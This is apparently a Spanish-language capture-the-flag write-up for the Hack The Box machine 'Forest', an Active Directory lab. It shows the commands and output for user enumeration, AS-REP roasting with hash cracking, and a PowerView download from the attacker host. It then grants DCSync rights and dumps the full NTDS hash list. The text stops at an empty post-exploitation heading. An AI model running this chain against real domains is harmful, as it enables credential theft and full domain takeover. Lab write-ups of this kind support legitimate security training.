Forest
| Sistema operativo | Dificultad | Fecha de Lanzamiento | Creador |
|---|---|---|---|
| Windows | Easy | 12 Octubre 2019 | egre55 & mrb3n8132 |
Escaneo de puertos
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.161
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 21:36 -03
Initiating SYN Stealth Scan at 21:36
Scanning 10.10.10.161 [65535 ports]
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 53/tcp on 10.10.10.161
Discovered open port 139/tcp on 10.10.10.161
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 464/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161
Discovered open port 49930/tcp on 10.10.10.161
Discovered open port 5985/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Discovered open port 9389/tcp on 10.10.10.161
Discovered open port 49676/tcp on 10.10.10.161
Discovered open port 49666/tcp on 10.10.10.161
Discovered open port 49684/tcp on 10.10.10.161
Discovered open port 49665/tcp on 10.10.10.161
Discovered open port 49677/tcp on 10.10.10.161
Discovered open port 49671/tcp on 10.10.10.161
Discovered open port 47001/tcp on 10.10.10.161
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
Discovered open port 49667/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
Discovered open port 49664/tcp on 10.10.10.161
Discovered open port 49703/tcp on 10.10.10.161
Completed SYN Stealth Scan at 21:36, 19.47s elapsed (65535 total ports)
Nmap scan report for 10.10.10.161
Host is up, received user-set (0.16s latency).
Scanned at 2025-04-10 21:36:01 -03 for 20s
Not shown: 65341 closed tcp ports (reset), 170 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
49676/tcp open unknown syn-ack ttl 127
49677/tcp open unknown syn-ack ttl 127
49684/tcp open unknown syn-ack ttl 127
49703/tcp open unknown syn-ack ttl 127
49930/tcp open unknown syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 19.57 seconds
Raw packets sent: 94146 (4.142MB) | Rcvd: 68268 (2.731MB)
Enumeración de versión y servicio
nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49676,49677,49684,49703,49930 -oN servicesScan 10.10.10.161
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 21:36 -03
Nmap scan report for 10.10.10.161 (10.10.10.161)
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-11 00:47:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49930/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-11T00:47:54
|_ start_date: 2025-04-08T05:55:54
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h30m17s, deviation: 4h02m32s, median: 10m15s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2025-04-10T17:47:55-07:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.68 seconds
Explotación inicial
echo '10.10.10.161 htb.local FOREST.htb.local' >> /etc/hosts
rpcclient 10.10.10.161 -U '' -N -c 'enumdomusers' | awk '{print $1}' | awk -F: '{print $2}' | tr -d '[|]'
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
mark
santi
john
TSSP
ax
tester
admin
warhome
root@kali:/home/d4redevil/htb/Forest/content# kerbrute userenum -d htb.local --dc 10.10.10.161 users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/10/25 - Ronnie Flathers @ropnop
2025/04/10 21:41:57 > Using KDC(s):
2025/04/10 21:41:57 > 10.10.10.161:88
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailboxc3d7722@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailboxfc9daad@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailboxc0a90c9@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailbox83d6781@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailboxb01ac64@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailbox670628e@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailbox6ded678@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailbox7108a4e@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailboxfd87238@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailbox968e74d@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: HealthMailbox0659cc1@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: svc-alfresco@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: mark@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: lucinda@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: sebastien@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: andy@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: santi@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: john@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: TSSP@htb.local
2025/04/10 21:41:57 > [+] VALID USERNAME: ax@htb.local
2025/04/10 21:41:58 > [+] VALID USERNAME: warhome@htb.local
2025/04/10 21:41:58 > [+] VALID USERNAME: admin@htb.local
2025/04/10 21:41:58 > [+] VALID USERNAME: tester@htb.local
Comprobamos si alguno de los usuarios tiene activo el atributo de Kerberos PRE-AUTH
$krb5asrep$23$svc-alfresco@HTB.LOCAL:68163eb0eb17db3cc537cae37fe5c84f$297be12ce7dee3df6e90b8aa1d916a78597fd573fe4217c7ca925255c323cced7ce284b0b50625bb1445d9ea3f6893345f81ffdbcc9df5ec224e6a60aab3adffd1d0b65a5566166ab74619ab5f23c3fedcd0c166ffcc58ad2d49b1782903ad5777e00aeb7ace06d4f7466527b1439de39d3daa75d4ca670eba3a8536747fc8e9277b4cc547c2ca61218bea9411a31683fd091656f1e3c9a7a22433c8b5833461d2dad9b63fada2f8cf139f426f5c38575aead6872981fff78aef905ae4d5508ed9c78d02093d25288cd86bb2a9980c44fb3f65fdfb6ef1064683a605744c074d483a751f2153
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
[!warning] Credenciales
Usuario: svc-alfresco
Contraseña: s3rvice
Servicio/Aplicación:
root@kali:/home/d4redevil/htb/Forest/content/ldap# ldapdomaindump -u 'htb.local\svc-alfresco' -p 's3rvice' 10.10.10.161
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
Enumeramos por bloodhound
root@kali:/home/d4redevil/htb/Forest/content/bloodhound# bloodhound-python -u 'svc-alfresco' -p 's3rvice'
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 38 users
INFO: Found 76 groups
INFO: Found 2 gpos
INFO: Found 15 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: EXCH01.htb.local
INFO: Querying computer: FOREST.htb.local
WARNING: Failed to get service ticket for FOREST.htb.local, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Done in 00M 55S
INFO: Compressing output into 20250410221055_bloodhound.zi
El usuario SVC-ALFRESCO@HTB.LOCAL es propietario del usuario WARHOME@HTB.LOCAL.
Los propietarios de objetos conservan la capacidad de modificar los descriptores de seguridad de los objetos, independientemente de los permisos en la DACL del objeto.
Cambiamos la contraseña del usuario Admin.
Subimos PowerView.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> iwr -uri http://10.10.14.2/PowerView.ps1 -o PowerView.ps1
Escalación de privilegios root/SYSTEM
Los miembros del grupo EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL tienen permisos para modificar la DACL (Lista de Control de Acceso Discrecional) en el dominio HTB.LOCAL.
Con acceso de escritura a la DACL del objeto de destino, puede otorgarse los privilegios que desee sobre el objeto.
Usamos el siguiente comando para asignarnos privilegios de DCSync a nuestra cuenta.
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\tester', $SecPassword)
Add-ObjectACL -PrincipalIdentity tester -Credential $Cred -Rights DCSync
Dump de la base de datos NTDS.dit
nxc smb 10.10.10.161 -u 'tester' -p 'Password123!' --ntds
root@kali:/home/d4redevil/htb/Forest/content# nxc smb 10.10.10.161 -u 'tester' -p 'Password123!' --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] y
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\tester:Password123!
SMB 10.10.10.161 445 FOREST [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.10.161 445 FOREST [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.161 445 FOREST htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
SMB 10.10.10.161 445 FOREST Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
SMB 10.10.10.161 445 FOREST DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
SMB 10.10.10.161 445 FOREST htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
SMB 10.10.10.161 445 FOREST htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
SMB 10.10.10.161 445 FOREST htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
SMB 10.10.10.161 445 FOREST htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
SMB 10.10.10.161 445 FOREST htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
SMB 10.10.10.161 445 FOREST htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
SMB 10.10.10.161 445 FOREST john:9601:aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040:::
SMB 10.10.10.161 445 FOREST TSSP:9602:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB 10.10.10.161 445 FOREST ax:9603:aad3b435b51404eeaad3b435b51404ee:ed679dbb4d39bb7bca395b146b6ed891:::
SMB 10.10.10.161 445 FOREST tester:9605:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
SMB 10.10.10.161 445 FOREST admin:9606:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB 10.10.10.161 445 FOREST warhome:9607:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB 10.10.10.161 445 FOREST FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:2bd0514f6f1990cf4650ce255fd1127b:::
SMB 10.10.10.161 445 FOREST EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
SMB 10.10.10.161 445 FOREST [+] Dumped 39 NTDS hashes to /root/.nxc/logs/FOREST_10.10.10.161_2025-04-10_233555.ntds of which 36 were added to the database
SMB 10.10.10.161 445 FOREST [*] To extract only enabled accounts from the output file, run the following command:
SMB 10.10.10.161 445 FOREST [*] cat /root/.nxc/logs/FOREST_10.10.10.161_2025-04-10_233555.ntds | grep -iv disabled | cut -d ':' -f1
SMB 10.10.10.161 445 FOREST [*] grep -iv disabled /root/.nxc/logs/FOREST_10.10.10.161_2025-04-10_233555.ntds | cut -d ':' -f1
Post Explotación
